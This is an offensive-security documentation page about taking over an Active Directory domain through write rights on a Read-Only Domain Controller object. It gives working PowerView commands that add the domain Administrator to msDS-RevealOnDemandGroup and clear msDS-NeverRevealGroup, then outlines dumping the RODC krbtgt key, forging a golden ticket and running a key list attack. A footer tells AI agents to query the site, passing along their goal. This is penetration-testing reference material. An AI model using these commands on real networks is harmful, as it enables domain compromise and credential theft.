> For the complete documentation index, see [llms.txt](https://red.infiltr8.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://red.infiltr8.io/ad/movement/dacl/rights-on-rodc-object.md).

# Rights on RODC object

With administrative control over the [RODC](/ad/movement/domain-settings/rodc.md) computer object in the Active Directory, there is a path to fully compromise the domain. It is possible to modify the RODC’s `msDS-NeverRevealGroup` and `msDS-RevealOnDemandGroup` attributes to allow a Domain Admin to authenticate and dump his credentials via administrative access over the RODC host.

{% hint style="info" %}
For more granularity, one of these ACEs against the RODC object is initially sufficient, since they will implicitly allow `WriteProperty` against the `msDS-RevealOnDemandGroup` and `msDS-NeverRevealGroup` attributes:

* `GenericWrite`
* `GenericAll` / `FullControl`
* `WriteDacl` (the attacker can modify the DACL and obtain arbitrary permissions)
* `Owns` (c.f. `WriteDacl`)
* `WriteOwner` (i.e. the attacker can obtain `Owns` -> `WriteDacl` -> other permissions)
* `WriteProperty` against the `msDS-RevealOnDemandGroup`attribute in conjunction with another primitive to gain privileged access to the host. `WriteProperty` against the `msDS-NeverRevealGroup` attribute may be required if it includes the target account.
  {% endhint %}

{% tabs %}
{% tab title="UNIX-like" %}
From UNIX-like systems, this [PowerView python package](https://github.com/aniqfakhrul/powerview.py) (Python) can be used to modify the LDAP attribute.

<pre class="language-bash"><code class="lang-bash"><strong>powerview "$DOMAIN"/"$USER":"$PASSWORD"@"RODC_FQDN"
</strong>
#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute
#Then, append the Allowed RODC Password Replication Group group
<strong>PV > Set-DomainObject -Identity RODC-server$ -Set msDS-RevealOnDemandGroup='CN=Administrator,CN=Users,DC=domain,DC=local'
</strong><strong>PV > Set-DomainObject -Identity RODC-server$ -Append msDS-RevealOnDemandGroup='CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local'
</strong>
#If needed, remove the admin from the msDS-NeverRevealGroup attribute
<strong>PV > Set-DomainObject -Identity RODC-server$ -Clear msDS-NeverRevealGroup
</strong></code></pre>

Then, dump the `krbtgt_XXXXX` key on the RODC server with admin access on the host (this can be done by modifying the `managedBy` attribute for example), and use it to forge a [RODC golden ticket](/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md) and conduct a [key list attack](https://github.com/v4resk/red-book/blob/main/ad/movement/credentials/dumping/kerberos-key-list.md) to retrieve the domain Administrator's password hash.
{% endtab %}

{% tab title="Windows" %}
From Windows systems, [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) (PowerShell) can be used for this purpose.

```powershell
#First, add a domain admin account to the msDS-RevealOnDemandGroup attribute
Set-DomainObject -Identity RODC-Server$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')}

#If needed, remove the admin from the msDS-NeverRevealGroup attribute
Set-DomainObject -Identity RODC-Server$ -Clear 'msDS-NeverRevealGroup'
```

Then, dump the `krbtgt_XXXXX` key on the RODC server with admin access on the host (this can be done by modifying the `managedBy` attribute for example), and use it to forge a [RODC golden ticket](/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md) and conduct a [key list attack](https://github.com/v4resk/red-book/blob/main/ad/movement/credentials/dumping/kerberos-key-list.md) to retrieve the domain Administrator's password hash.
{% endtab %}
{% endtabs %}

## References

{% embed url="<https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06>" %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://red.infiltr8.io/ad/movement/dacl/rights-on-rodc-object.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.